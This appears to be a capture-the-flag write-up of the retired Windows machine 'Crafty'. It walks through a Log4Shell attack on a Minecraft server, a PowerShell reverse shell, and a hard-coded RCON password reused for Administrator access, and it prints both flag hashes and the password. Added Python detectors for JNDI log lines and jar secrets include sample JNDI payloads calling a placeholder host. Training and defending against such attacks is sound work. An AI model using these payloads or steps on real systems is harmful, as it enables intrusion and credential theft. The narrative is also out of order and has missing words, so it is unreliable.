Crafty (Easy)
Difficulty -> Easy
OS -> Windows
State -> Retired
Tags -> Web Application / Injections / Common Applications / Remote Code Execution / Hard-coded Credentials / Batch / Java
Then I did an exhaustive scan to learn more about the services running on the open ports
I explored all the site buttons but got redirected to a Coming Soon page with no relevant info. The only interesting thing I found was a domain that, given the context of the page, should belong to the Minecraft server running on the machine, which the previous scan had also shown me
After that I inserted the JNDI payload in the client and checked the script, which notified me of an incoming request, confirming the request had been sent properly; checking the listener as well, I had caught a shell from the machine
Once inside I went to the Desktop of the user where I found a user.txt file and reading its content I retrieved the user flag
With that, I got the user flag
Answer: 286dda4cbcfb299d664f02c2511a543
To find a way to escalate privileges I started looking at the files under the server's folder. There I found files related to logs and configurations, but what caught my attention was the plugins folder, as plugins are usually added externally to the base software and are well known for being vulnerable across many types of applications. Checking the content of this folder, there was a playercounter plugin that could be saving some interesting data about users
Finally, I went to the Desktop folder where I found a root.txt file, and reading its content I retrieved the root flag
With that, I got the root flag and pwned the machine
Answer: ccd0681e8e2d4988e392984202922be3
I started with an initial port scan using
I found an HTTP service on port 80 so I tried accessing the content in the browser. I got redirected to the crafty.htb domain but couldn't get the content. So I added it to my list of known hosts in the /etc/hosts file and visited again, this time getting access to a page about a server for the popular game
To learn more about the HTTP protocol you can go
As I didn't have the game, I tried finding an alternative way to interact with this server. After much searching, I found a with a console client to interact with Minecraft servers, which would log some interactions and let me send commands as if I were in the game. I downloaded the on my machine and then executed the client, specifying an arbitrary username with no password and the target IP
Now that I could interact with the server, I tried looking for any possible vulnerability related to this game version. After some research, I found an about a previous security warning related to the login library. It was vulnerable to the well-known Log4Shell vulnerability, so I started to find a way to exploit it, and fortunately, to facilitate the process, I found a on GitHub
I downloaded it, checked its structure, and noticed something I had to modify. In line 26 of the script it spawned a /bin/sh binary, so I changed it to powershell.exe as our target was a Windows machine. Then I set up a listener with to catch the connection and reviewed the parameters needed, setting my IP to make the request, an arbitrary port where the web server would be deployed, and the port where the listener was running
To learn more about the Log4Shell vulnerability and its exploitation you can go
After executing it I got several errors related to Java. I didn't understand what was wrong, so I reviewed the repository again and noticed that for this script to work, I would need a proper in the repository. So I did that, and with the JDK folder in the same place as the script, I re-ran it, this time deploying everything without a problem
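From the defender's side, the chat-message vector used above leaves a trace in the server log: the `${jndi:...}` lookup string itself, often wrapped in nested `${lower:...}` or `${::-x}` lookups to dodge naive matching. The following is an added example, not code from the writeup or the exploit repository it uses; the log lines, host and ports are constructed placeholders, and it unwraps those nested lookups before matching so obfuscated variants are caught too.

```python
import re

# Constructed sample lines in the style of a Minecraft server log (not from the page);
# the host 10.0.0.5 and the ports are placeholders.
SAMPLE_LOG = """\
[12:01:03] [Server thread/INFO]: steve joined the game
[12:01:10] [Server thread/INFO]: <steve> hello everyone
[12:02:44] [Server thread/INFO]: <guest> ${jndi:ldap://10.0.0.5:1389/a}
[12:03:01] [Server thread/INFO]: <guest> ${${lower:j}ndi:${lower:r}mi://10.0.0.5:1099/x}
[12:03:15] [Server thread/INFO]: <guest> ${${::-j}${::-n}di:dns://10.0.0.5/ping}
[12:03:40] [Server thread/INFO]: <steve> my home dir is ${env:HOME}
"""

# ${lower:x} / ${upper:x} wrappers used to hide the jndi keyword
CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.I)
# ${something:-x} default-value trick, e.g. ${::-j}
DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# the lookup itself, once unwrapped: scheme and host[:port]
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|https?)\s*://([^/}\s]+)", re.I)


def normalize(text: str) -> str:
    """Collapse nested lookups until nothing changes, so obfuscated forms
    reduce to the plain ${jndi:scheme://host} shape."""
    prev = None
    while prev != text:
        prev = text
        text = CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def scan_log(log: str) -> list:
    """Return one dict per line carrying a JNDI lookup (line number, scheme, host)."""
    hits = []
    for lineno, line in enumerate(log.splitlines(), 1):
        m = JNDI_LOOKUP.search(normalize(line))
        if m:
            hits.append({"line": lineno, "scheme": m.group(1).lower(),
                         "host": m.group(2), "raw": line})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} lookup to {hit['host']}")
```

Feeding the real `logs/latest.log` through `scan_log` gives the lines and callback hosts an analyst would want to block and investigate.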
I checked the permissions we had on the folder, but we didn't have write permissions, so we couldn't export or copy the content of the file. So I went to the root folder and created a Temp folder, which would give me that ability, then copied the file there and used to encode its content to base64 to prepare it for the transfer
Having the encoded content, I copied it to a file on my machine and reverted the encoding with the base64 command, saving the result as a .jar file to get the same file back. Then I searched the web for a and uploaded the file, being able to see the source code of the executable
I understood that this plugin was connecting to an RCON service, logging in locally with the password s67uB4zKqBIXw and then doing the counting. This leaked a possible password for a user on the system, maybe the Administrator user. So to try logging in, or even better to run commands as another user, I could try using the utility. To do so, I downloaded the binary on my machine and exported it to the target
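The manual audit above (decode the base64 transfer, open the jar, read the decompiled source for a hard-coded password) can be partly automated as a secret-scanning check over the plugin's class files. This is an added example, not the page's or the plugin's own code; it builds a constructed stand-in jar in memory (with a made-up credential string) and flags high-entropy string constants that are neither class descriptors nor plain words.

```python
import base64
import io
import math
import re
import zipfile

PRINTABLE = re.compile(rb"[\x20-\x7e]{8,64}")   # runs of printable ASCII, like `strings`
DESCRIPTOR_CHARS = set("/;().<>[$")            # typical of class names and method descriptors


def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(s.count(c) / n * math.log2(s.count(c) / n) for c in set(s))


def looks_like_secret(s: str) -> bool:
    """Heuristic: no descriptor characters or spaces, mixes letters and digits,
    and at least 3 bits of entropy per character (plain words score lower)."""
    if DESCRIPTOR_CHARS & set(s) or " " in s:
        return False
    if not (any(c.isalpha() for c in s) and any(c.isdigit() for c in s)):
        return False
    return shannon_entropy(s) >= 3.0


def scan_jar_b64(b64_text: str) -> list:
    """Decode a base64-transferred jar, check the zip magic, and return
    (entry name, candidate secret) pairs found in its .class files."""
    raw = base64.b64decode(b64_text)
    if raw[:2] != b"PK":
        raise ValueError("decoded data is not a zip/jar (bad magic)")
    findings = []
    with zipfile.ZipFile(io.BytesIO(raw)) as jar:
        for name in jar.namelist():
            if not name.endswith(".class"):
                continue
            for m in PRINTABLE.finditer(jar.read(name)):
                s = m.group().decode("ascii")
                if looks_like_secret(s):
                    findings.append((name, s))
    return findings


def build_sample_jar_b64() -> str:
    """Constructed stand-in for a plugin jar: a class-like blob whose
    constant-pool style strings include one made-up credential."""
    fake_class = (b"\xca\xfe\xba\xbe\x00\x00\x00\x34\x00java/lang/Object\x00"
                  b"password\x00Xk9pQ2mzT7vA\x00localhost\x00")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("plugin.yml", "name: counter\nmain: Counter\n")
        z.writestr("Counter.class", fake_class)
    return base64.b64encode(buf.getvalue()).decode()
```

Run on a real plugin, the flagged strings are the ones to check against the decompiled source and rotate if they turn out to be credentials.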
Then I set up another listener and used the binary to spawn a reverse shell: a PowerShell that would connect back to my machine, run with the proper credentials. With that, I successfully gained a shell as the Administrator user